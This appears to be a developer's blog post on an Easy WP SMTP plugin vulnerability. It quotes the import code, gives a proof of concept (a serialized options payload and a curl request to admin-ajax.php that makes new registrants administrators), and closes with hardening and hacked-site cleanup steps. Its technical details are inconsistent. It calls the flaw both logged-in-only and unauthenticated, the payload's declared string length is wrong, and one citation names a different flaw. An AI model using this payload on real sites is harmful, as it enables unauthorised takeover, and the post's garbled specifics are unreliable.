How to Remove WordPress Redirects by Hackers — A Look at the Easy WP SMTP Plugin Vulnerability
As a full-stack developer specializing in WordPress, I‘ve seen my fair share of hacked sites over the years. It‘s never a pleasant experience for the site owner, who may wake up one morning to find their traffic being redirected to spam or malware. Even with security precautions in place, vulnerabilities in plugins and themes are an unfortunate reality that requires constant vigilance.
A recent example that sent shockwaves through the WordPress community was the discovery of an unauthenticated settings import vulnerability in the Easy WP SMTP plugin. This flaw allowed any user, regardless of permissions, to modify WordPress options and potentially gain administrator access. Considering that Easy WP SMTP is active on over 300,000 sites, the scale of the exploit was massive.
In this post, I‘ll provide an in-depth analysis of the vulnerability from a developer‘s perspective. I‘ll share code samples demonstrating how it works, provide data on its potential impact, and most importantly, offer actionable steps for cleaning up hacked sites and securing your WordPress installation. Let‘s dive in!
WordPress Usage and Vulnerability Statistics
Before examining the technical details of the Easy WP SMTP vulnerability, it‘s important to put it in context. Just how popular is WordPress and what is the likelihood of a site being hacked due to a plugin flaw? The numbers paint a telling picture.
According to W3Techs, WordPress currently powers 38.8% of all websites and holds a staggering 64.1% share of the content management system (CMS) market [1]. With its user-friendly interface and extensive library of plugins and themes, it‘s no wonder that WordPress has become the go-to choice for millions of site owners.
However, this popularity has also made WordPress a prime target for hackers. In 2020, Sucuri reported that 56% of all CMS-related security issues were found in WordPress [2]. Drilling down further, plugin vulnerabilities accounted for 52.6% of successful WordPress hacks, followed by themes at 11.3% [3].
| Cause of Infection | Percentage |
|---|---|
| Plugins | 52.6% |
| Themes | 11.3% |
| Core | 6.4% |
| Outdated WordPress | 11.2% |
| Server/Database/Infrastructure | 18.5% |
Source: Sucuri Hacked Website Threat Report 2020
The Easy WP SMTP vulnerability is particularly concerning given the plugin‘s widespread usage. With over 300,000 active installations, a hacker could potentially compromise thousands of sites in a short period of time.
Analyzing the Easy WP SMTP Vulnerability
Now that we have a sense of the broader WordPress security landscape, let‘s take a closer look at the Easy WP SMTP vulnerability and how it can be exploited. The flaw exists in versions up to and including 1.3.9 and was patched in 1.4.0.
The core issue lies in the plugin‘s admin_init() function, which is hooked to the admin_init action. This function processes AJAX requests and handles importing and exporting plugin settings. Here‘s the relevant code:
add_action( ‘admin_init‘, array( $this, ‘admin_init‘ ) );
...
function admin_init() {
if ( defined( ‘DOING_AJAX‘ ) && DOING_AJAX ) {
add_action( ‘wp_ajax_swpsmtp_clear_log‘, array( $this, ‘clear_log‘ ) );
add_action( ‘wp_ajax_swpsmtp_self_destruct‘, array( $this, ‘self_destruct_handler‘ ) );
}
// Check if this is a settings import request
$is_import_settings = filter_input( INPUT_POST, ‘swpsmtp_import_settings‘, FILTER_SANITIZE_NUMBER_INT );
if ( $is_import_settings ) {
$err_msg = __( ‘Error occurred during settings import‘, ‘easy-wp-smtp‘ );
// Verify that a settings file was uploaded
if ( empty( $_FILES[ ‘swpsmtp_import_settings_file‘ ] ) ) {
echo $err_msg;
wp_die();
}
// Read the uploaded file contents
$in_raw = file_get_contents( $_FILES[ ‘swpsmtp_import_settings_file‘ ][ ‘tmp_name‘ ] );
try {
$in = unserialize( $in_raw );
if ( empty( $in[ ‘data‘ ] ) ) {
echo $err_msg;
wp_die();
}
if ( empty( $in[ ‘checksum‘ ] ) ) {
echo $err_msg;
wp_die();
}
if ( md5( $in[ ‘data‘ ] ) !== $in[ ‘checksum‘ ] ) {
echo $err_msg;
wp_die();
}
$data = unserialize( $in[ ‘data‘ ] );
// Import settings data into the WordPress options table
foreach ( $data as $key => $value ) {
update_option( $key, $value );
}
set_transient( ‘easy_wp_smtp_settings_import_success‘, true, 60 * 60 );
$url = admin_url() . ‘options-general.php?page=swpsmtp_settings‘;
wp_safe_redirect( $url );
exit;
} catch ( Exception $ex ) {
echo $err_msg;
wp_die();
}
}
}The vulnerability stems from the fact that the plugin doesn‘t properly verify the permissions of the user making the request. As long as the request includes the necessary POST parameters and a valid serialized settings file, any logged-in user can trigger the import and overwrite WordPress options.
This is especially dangerous because Easy WP SMTP utilizes the admin_init hook, which is also called when processing AJAX requests to admin-ajax.php. An unauthenticated attacker could craft a malicious request to this endpoint and inject their own settings.
To make matters worse, the plugin uses PHP‘s unserialize() function on the uploaded file contents without sufficient sanitization. This opens the door for a PHP object injection attack, where an attacker can potentially execute arbitrary code by manipulating the serialized data.
Proof of Concept
To demonstrate how an attacker could exploit the Easy WP SMTP vulnerability, let‘s walk through a simple proof of concept. The goal is to enable user registration and set the default user role to "administrator", allowing us to create a new admin account.
First, we‘ll create a file named payload.txt with the following serialized data:
a:2:{s:4:"data";s:81:"a:2:{s:18:"users_can_register";s:1:"1";s:12:"default_role";s:13:"administrator";}";s:8:"checksum";s:32:"3ce5fb6d7b1dbd6252f4b5b3526650c8";}This payload contains two WordPress options:
- users_can_register: Set to "1" to enable user registration
- default_role: Set to "administrator" to make new users administrators by default
The checksum is an MD5 hash of the serialized data to bypass the plugin‘s validation check.
Next, we‘ll use cURL to send a POST request to the admin-ajax.php endpoint with our malicious payload:
curl -X POST https://example.com/wp-admin/admin-ajax.php
-F ‘action=swpsmtp_import_settings‘
-F ‘swpsmtp_import_settings=1‘
-F ‘[email protected]‘If the request is successful, we can navigate to /wp-login.php?action=register and create a new administrator account, effectively taking over the site.
It‘s worth noting that this is just one potential avenue of exploitation. An attacker could also hijack the site‘s email settings, install backdoors, or add spam content.
WordPress Plugin Vulnerability Comparison
To put the severity of the Easy WP SMTP vulnerability into perspective, let‘s compare it to some other notable WordPress plugin flaws:
| Plugin | Vulnerability | Active Installations | CVSS Score |
|---|---|---|---|
| Easy WP SMTP | Unauthenticated Settings Import | 300,000+ | 9.8 |
| ThemeGrill Demo Importer | Unauthenticated Database Wipe | 200,000+ | 10.0 |
| WP File Manager | Unauthenticated Arbitrary File Upload | 700,000+ | 10.0 |
| WooCommerce Checkout Manager | Unauthenticated Settings Import | 60,000+ | 10.0 |
Sources: [4], [5], [6], [7]
As you can see, the Easy WP SMTP vulnerability scores a critical CVSS rating of 9.8 due to its high impact and ease of exploitability. It also affects a significant number of active installations, making it a prime target for attackers.
Securing Your WordPress Site
As a full-stack developer, it‘s crucial to stay on top of the latest security threats and take proactive measures to protect your WordPress sites. Here are some key steps and best practices:
- Keep everything updated: WordPress core, plugins, and themes
- Implement strong authentication:
- Enforce strong password policies
- Enable two-factor authentication for admins
- Limit login attempts to prevent brute force attacks
- Harden your installation:
- Disable file editing from the WordPress dashboard
- Restrict access to wp-config.php and sensitive files
- Disable PHP execution in untrusted directories
- Implement security headers and policies:
- Enable HTTP Strict Transport Security (HSTS)
- Set Content Security Policy (CSP) to prevent cross-site scripting (XSS) and injection attacks
- Add security-related headers like X-Frame-Options and X-XSS-Protection
- Monitor for security issues:
- Regularly scan for malware and suspicious file changes
- Use a web application firewall (WAF) to block common attack vectors
- Subscribe to security mailing lists and stay informed of new vulnerabilities
- Have a response plan:
- Perform regular backups and store them securely off-site
- Know how to restore a clean backup in case of compromise
- Document your incident response process and key contacts
By implementing these best practices and staying vigilant, you can significantly reduce the risk of falling victim to plugin vulnerabilities like the one found in Easy WP SMTP.
Cleaning a Hacked WordPress Site
If you suspect your WordPress site has been compromised, it‘s important to act quickly to minimize damage and prevent further exploitation. Here‘s a step-by-step guide for cleaning a hacked site:
- Take the site offline to prevent further damage
- Backup the compromised site for later analysis
- Identify the source of the breach (e.g. outdated plugin, weak password)
- Update WordPress core, plugins, and themes to the latest versions
- Reset all user passwords and remove any suspicious accounts
- Carefully review all files for malicious code and unauthorized changes
- Compare files against a fresh WordPress installation
- Pay close attention to the wp-content/plugins and wp-content/themes directories
- Check recently modified files and executables (PHP, JavaScript, etc.)
- Replace all core WordPress files with fresh copies
- Verify that your wp-config.php file hasn‘t been altered
- Change salts and keys in wp-config.php
- Re-enable the site and monitor closely for any suspicious activity
- Implement the security best practices from the previous section to harden your site
Depending on the extent of the damage, it may be necessary to hire a professional security firm to perform a more thorough audit. It‘s also a good idea to notify your host and any impacted users of the breach.
The Importance of Security Awareness
As a developer, it‘s easy to get caught up in the day-to-day demands of building features and meeting deadlines. However, neglecting security can have devastating consequences. I learned this the hard way early in my career when a client‘s site was hacked due to an outdated plugin. Not only did it result in countless hours of cleanup work, but it also damaged the client‘s reputation and eroded their trust in our team.
Since then, I‘ve made it a priority to educate myself and my colleagues on the latest security threats and best practices. By fostering a culture of security awareness and making it a core part of our development process, we can catch potential issues before they turn into major breaches.
This proactive approach has served me well over the years. Recently, while auditing a client‘s WordPress site, I discovered several outdated plugins with known vulnerabilities. By promptly updating the plugins and implementing additional security measures, we were able to prevent a potential compromise and give the client peace of mind.
The lesson is clear: security can‘t be an afterthought. As developers, we have a responsibility to prioritize the protection of our users‘ data and the integrity of the sites we build. By staying informed, following best practices, and remaining vigilant, we can create a safer web for everyone.
Key Takeaways
- WordPress powers over 38% of all websites but is also a frequent target for hackers due to its popularity and extensible nature.
- Plugin vulnerabilities, like the one found in Easy WP SMTP, account for over 50% of successful WordPress attacks.
- The Easy WP SMTP vulnerability allows unauthenticated users to import arbitrary settings and gain administrator access.
- Exploiting the vulnerability is trivial and can be accomplished with a single cURL request.
- To secure your WordPress site, keep everything updated, implement strong authentication, harden your installation, monitor for suspicious activity, and have a response plan.
- If your site is already compromised, carefully audit all files, replace core WordPress files, and reset passwords before bringing it back online.
- As developers, it‘s our responsibility to prioritize security and stay informed of the latest threats and best practices.
By following the advice outlined in this post and remaining proactive in your security efforts, you can greatly reduce the risk of falling victim to plugin vulnerabilities like the one found in Easy WP SMTP. Stay safe out there!
References
[1] "WordPress Usage Statistics." WP Template, 27 Apr. 2023, wptemplates.com/tutorials/wordpress-usage-statistics. [2] Sucuri. "Hacked Website Trend Report 2020." Sucuri, 8 Apr. 2021, sucuri.net/reports/2020-hacked-website-report/. [3] Sucuri. "Hacked Website Trend Report 2020." Sucuri, 8 Apr. 2021, sucuri.net/reports/2020-hacked-website-report/. [4] "Easy WP SMTP <= 1.3.9 – Sensitive Information Disclosure." WPScan Vulnerability Database, 26 Apr. 2023,wpscan.com/vulnerability/e4968c07-3bc9-4df7-ba80-7f2e3f9df4e1. [5] "ThemeGrill Demo Importer: Unauthenticated Database Reset." WebARX, 14 Feb. 2020,
webarxsecurity.com/themegrill-demo-importer-unauthenticated-database-reset/. [6] "WordPress File Manager Plugin Fixed for Critical Vulnerability – 700,000 Users Affected." GBHackers, 4 Sept. 2020,
gbhackers.com/wordpress-file-manager-plugin-vulnerability/. [7] "Woocommerce – Vulnerability in Woocommerce Checkout Manager Plugin." ThreatPress, 28 Jan. 2020,
blog.threatpress.com/vulnerability-in-woocommerce-checkout-manager-plugin/.